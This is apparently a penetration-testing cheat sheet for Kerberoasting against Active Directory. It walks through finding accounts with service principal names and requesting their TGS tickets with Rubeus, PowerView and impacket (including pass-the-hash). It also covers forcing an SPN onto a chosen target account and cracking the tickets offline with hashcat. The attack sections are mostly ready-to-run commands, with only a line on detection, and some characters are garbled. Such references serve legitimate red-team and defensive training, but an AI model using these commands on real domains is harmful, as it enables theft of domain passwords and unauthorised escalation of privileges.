πΎ Overview
Kerberoasting is an attack that exploits the ServicePrincipalName
AD Attribute to request TGS tickets for user accounts. These tickets are encrypted with keys from user passwords, and can be cracked offline.
π Discovery
Requirements:
- Any valid domain account
- A user with a
ServicePrincipalName
that is not null
Windows enumeration:
# Using PowerView to find vulnerable accounts
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
# Using PowerShell to find vulnerable accounts
get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"}
# Using Rubeus to find vulnerable accounts
.\Rubeus.exe kerberoast /stats
# Builtin binary
setspn.exe -Q */*
Linux enumeration:
# Using ldapsearch to find kerberoastable users
ldapsearch -LLL -x -H ldap://[IP] -D "[USERNAME]" -W -b "dc=[DOMAIN],dc=[TLD]β "(&(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))(!(Us erAccountControl:1.2.840.113556.1.4.803:=2)))"
π Exploitation
Windows:
# Using Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoast.hash
# Rubeus with a user
.\Rubeus.exe kerberoast /outfile:kerberoast.hash /creduser:[DOMAIN]\[USERNAME] /credpassword:[PASSWORD]
# Using PowerView
Request-SPNTicket -SPN "[SPN]" -Format Hashcat
Linux:
# Password will be prompted
impacket-GetUserSPNs -request -dc-ip [IP] [DOMAIN]/[USER] -outputfile kerberoast.hash
# Pass the hash
impacket-GetUserSPNs -request -dc-ip [IP] -hashes [LMHASH]:[NTHASH] [Domain]/[USER] -outputfile kerberoast.hash
If you encounter a Kerberos clock skew error, try this fix.
π― Targeted Kerberoast
Targeted Kerberoasting can be carried out to obtain the password of a specific user. If an object has elevated permissions over the target, an attacker can add an SPN to that account making it Kerberoastable.
π Discovery
Requirements:
- Any valid domain account
- One of the following permissions over the target
- GenericAll
- GenericWrite
- WriteProperty
- Validated-SPN
Use Bloodhound to easily find users that are susceptible to this attack.
π Exploitation
- Authenticate as the user with one of the required permissions.
# Use a credential object if your session is not for the desired user
$SecPassword = ConvertTo-SecureString '[PASSWORD]' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('[DOMAIN]\[USERNAME]', $SecPassword)
# Set the SPN for the target account - Uses PowerView
# Omit credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -SET @{serviceprincipalname='random/garbage'}
- Kerberoast
- Cleanup - remove the SPN
# Omit credential if not needed
Set-DomainObject -Credential $Cred -Identity [TARGET USERNAME] -Clear serviceprincipalname
β¨ Post-Exploitation
Once a TGS is obtained, it can be cracked using hashcat to obtain the userβs password.
# Simple dictionary attack
hashcat -a 0 -m 13100 ./kerberoast.hash [wordlist]
π Detection & Evasion
Kerrberoasting generates the Windows event 4769 - A Kerberos service ticket was requested
.